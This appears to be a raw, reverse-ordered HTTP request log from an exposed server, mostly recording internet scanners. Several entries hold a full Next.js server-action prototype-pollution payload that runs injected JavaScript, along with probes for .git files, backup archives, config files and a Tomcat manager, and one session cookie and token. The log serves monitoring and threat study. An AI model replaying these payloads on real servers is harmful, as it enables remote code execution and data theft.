Method: GET
[2026-03-13 09:15:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 71.6.134.231:33326
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 09:14:30] === HTTP Request ===
[2026-03-13 09:13:59] Main page accessed - IP: 71.6.134.231:54882
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 71.6.134.231:54882
Path: /
URL: /
Method: GET
[2026-03-13 09:13:59] === HTTP Request ===
[2026-03-13 09:08:41] Main page accessed - IP: 146.148.113.3:53768
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.148.113.3:53768
Path: /
URL: /
Method: GET
[2026-03-13 09:08:41] === HTTP Request ===
[2026-03-13 08:10:03] Main page accessed - IP: 167.172.90.204:47790
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.172.90.204:47790
Path: /
URL: /
Method: GET
[2026-03-13 08:10:03] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.167:61568
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 07:46:54] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 167.94.138.167:64588
Path: *
URL: *
Method: PRI
[2026-03-13 07:46:53] === HTTP Request ===
[2026-03-13 07:46:52] Main page accessed - IP: 167.94.138.167:64572
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.167:64572
Path: /
URL: /
Method: GET
[2026-03-13 07:46:52] === HTTP Request ===
[2026-03-13 06:15:47] Main page accessed - IP: 66.175.213.4:41750
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.175.213.4:41750
Path: /
URL: /
Method: GET
[2026-03-13 06:15:47] === HTTP Request ===
[2026-03-13 04:58:46] Main page accessed - IP: 34.215.173.178:34938
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.215.173.178:34938
Path: /
URL: /
Method: GET
[2026-03-13 04:58:46] === HTTP Request ===
[2026-03-13 03:33:06] Main page accessed - IP: 176.65.149.45:50182
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:50182
Path: /
URL: /
Method: GET
[2026-03-13 03:33:06] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.175:36365
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-13 03:18:25] === HTTP Request ===
[2026-03-13 03:18:19] Main page accessed - IP: 64.62.156.178:22569
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.178:22569
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-13 03:18:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.175:46887
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 03:17:31] === HTTP Request ===
[2026-03-13 03:16:54] Main page accessed - IP: 64.62.156.172:29916
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.172:29916
Path: /
URL: /
Method: GET
[2026-03-13 03:16:54] === HTTP Request ===
[2026-03-13 02:40:02] Main page accessed - IP: 87.236.176.114:52767
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.114:52767
Path: /
URL: /
Method: GET
[2026-03-13 02:40:02] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50050
Path: /.openclaw/workspace/chroma.db
URL: /.openclaw/workspace/chroma.db
Method: GET
[2026-03-13 02:29:14] === HTTP Request ===
===================
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.39
From: oai-searchbot(at)openai.com
Accept: */*
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51604
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-13 02:13:08] === HTTP Request ===
===================
------WebKitFormBoundaryx1717432696279--
------WebKitFormBoundaryx1717432696279
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1717432696279
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 224359+true+7654842;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1717432696279
X-Nextjs-Html-Request-Id: ilovepoop_1717432696279
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1717432696279
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49632
Path: /api/route
URL: /api/route
Method: POST
[2026-03-13 02:12:37] === HTTP Request ===
===================
------WebKitFormBoundaryx1256491029761--
------WebKitFormBoundaryx1256491029761
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1256491029761
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 339842+true+3697280;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1256491029761
X-Nextjs-Html-Request-Id: ilovepoop_1256491029761
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1256491029761
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49626
Path: /app
URL: /app
Method: POST
[2026-03-13 02:12:36] === HTTP Request ===
===================
------WebKitFormBoundaryx297830872312--
------WebKitFormBoundaryx297830872312
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx297830872312
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 92607+true+3216073;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx297830872312
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx297830872312
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_297830872312
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49610
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-13 02:12:35] === HTTP Request ===
===================
------WebKitFormBoundaryx255497400829--
------WebKitFormBoundaryx255497400829
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx255497400829
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 61003+true+4188276;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx255497400829
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx255497400829
Accept-Encoding: gzip, deflate
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_255497400829
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49600
Path: /api
URL: /api
Method: POST
[2026-03-13 02:12:34] === HTTP Request ===
===================
------WebKitFormBoundaryx2227494707341--
------WebKitFormBoundaryx2227494707341
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2227494707341
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 320460+true+6950929;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2227494707341
X-Nextjs-Html-Request-Id: ilovepoop_2227494707341
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2227494707341
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49584
Path: /_next
URL: /_next
Method: POST
[2026-03-13 02:12:34] === HTTP Request ===
[2026-03-13 02:12:34] Main page accessed - IP: 195.3.221.86:49576
===================
------WebKitFormBoundaryx156342167873--
------WebKitFormBoundaryx156342167873
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx156342167873
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 205216+true+761842;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx156342167873
Next-Action: x
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx156342167873
X-Nextjs-Html-Request-Id: ilovepoop_156342167873
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49576
Path: /
URL: /
Method: POST
[2026-03-13 02:12:34] === HTTP Request ===
[2026-03-13 00:50:48] Main page accessed - IP: 207.90.244.22:35334
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.22:35334
Path: /
URL: /
Method: GET
[2026-03-13 00:50:48] === HTTP Request ===
[2026-03-13 00:48:34] Main page accessed - IP: 167.172.90.204:32908
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.172.90.204:32908
Path: /
URL: /
Method: GET
[2026-03-13 00:48:34] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 165.232.184.233:64006
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-13 00:40:27] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 165.232.184.233:64002
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-13 00:40:27] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 165.232.184.233:63998
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-13 00:40:27] === HTTP Request ===
===================
Proxy-Connection: close
Headers:
Protocol: HTTP/1.1
Host: www.example.com:443
RemoteAddr: 185.224.128.16:55042
Path:
URL: //www.example.com:443
Method: CONNECT
[2026-03-13 00:18:06] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 40.124.175.26:52454
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-03-13 00:09:54] === HTTP Request ===
===================
X-Forwarded-For: 45.135.135.188
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37140
Path: /backup.zip
URL: /backup.zip
Method: GET
[2026-03-12 23:20:08] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.135.188
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37140
Path: /archive.tar.gz
URL: /archive.tar.gz
Method: GET
[2026-03-12 23:20:07] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.135.188
Via: 1.1 Caddy
Accept-Language: en
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37140
Path: /archive.zip
URL: /archive.zip
Method: GET
[2026-03-12 23:20:07] === HTTP Request ===
===================
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Language: en
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47978
Path: /vulnberries.ru.zip
URL: /vulnberries.ru.zip
Method: GET
[2026-03-12 23:04:12] === HTTP Request ===
===================
X-Forwarded-Proto: https
Accept-Language: en
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47978
Path: /admin.vulnberries.ru.zip
URL: /admin.vulnberries.ru.zip
Method: GET
[2026-03-12 23:04:12] === HTTP Request ===
[2026-03-12 22:39:31] Main page accessed - IP: 205.210.31.228:58822
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.228:58822
Path: /
URL: /
Method: GET
[2026-03-12 22:39:31] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.211:35305
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 22:13:34] === HTTP Request ===
[2026-03-12 22:13:34] Main page accessed - IP: 104.152.52.211:32781
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.211:32781
Path: /
URL: /
Method: GET
[2026-03-12 22:13:34] === HTTP Request ===
[2026-03-12 22:08:52] Main page accessed - IP: 167.172.90.204:59176
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.172.90.204:59176
Path: /
URL: /
Method: GET
[2026-03-12 22:08:52] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.36:58324
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 21:19:11] === HTTP Request ===
[2026-03-12 21:19:11] Main page accessed - IP: 85.217.140.36:58308
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.36:58308
Path: /
URL: /
Method: GET
[2026-03-12 21:19:11] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 212.23.222.58:37772
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-03-12 20:14:50] === HTTP Request ===
[2026-03-12 19:10:25] Main page accessed - IP: 147.185.132.60:49981
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.60:49981
Path: /
URL: /
Method: GET
[2026-03-12 19:10:25] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Gpc: 1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.5
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 178.62.33.6:52612
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 19:03:06] === HTTP Request ===
[2026-03-12 19:03:06] Main page accessed - IP: 178.62.33.6:52598
===================
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Sec-Gpc: 1
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Linux"
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 178.62.33.6:52598
Path: /
URL: /
Method: GET
[2026-03-12 19:03:06] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50013
Path: /docker-compose.yml
URL: /docker-compose.yml
Method: GET
[2026-03-12 17:34:30] === HTTP Request ===
[2026-03-12 16:24:34] Main page accessed - IP: 152.42.170.168:57008
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.170.168:57008
Path: /
URL: /
Method: GET
[2026-03-12 16:24:34] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:44874
Path: /jars
URL: /jars
Method: GET
[2026-03-12 16:13:00] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.121:36029
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 15:40:41] === HTTP Request ===
[2026-03-12 15:40:41] Main page accessed - IP: 104.152.52.121:45873
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.121:45873
Path: /
URL: /
Method: GET
[2026-03-12 15:40:41] === HTTP Request ===
[2026-03-12 15:35:47] Main page accessed - IP: 178.128.30.185:59584
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.30.185:59584
Path: /
URL: /
Method: GET
[2026-03-12 15:35:47] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 185.22.152.250
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45994
Path: /.git/HEAD
URL: /.git/HEAD
Method: GET
[2026-03-12 15:27:48] === HTTP Request ===
[2026-03-12 14:32:15] Main page accessed - IP: 172.30.0.12:45128
===================
Cookie: user_id=1; auth=sess_1773323198501875199
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Priority: u=1, i
Pragma: no-cache
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
X-Forwarded-Proto: https
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/salary
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45128
Path: /
URL: /
Method: GET
[2026-03-12 14:32:15] === HTTP Request ===
===================
------WebKitFormBoundaryx628779684715--
------WebKitFormBoundaryx628779684715
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx628779684715
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 139039+true+4522326;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx628779684715
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_628779684715
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx628779684715
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33750
Path: /api/route
URL: /api/route
Method: POST
[2026-03-12 14:31:37] === HTTP Request ===
===================
------WebKitFormBoundaryx390404309317--
------WebKitFormBoundaryx390404309317
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx390404309317
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 89572+true+4358553;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx390404309317
X-Nextjs-Html-Request-Id: ilovepoop_390404309317
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx390404309317
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33744
Path: /app
URL: /app
Method: POST
[2026-03-12 14:31:34] === HTTP Request ===
===================
------WebKitFormBoundaryx737234045515--
------WebKitFormBoundaryx737234045515
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx737234045515
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 107241+true+6874554;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx737234045515
X-Nextjs-Html-Request-Id: ilovepoop_737234045515
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx737234045515
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Next-Action: x
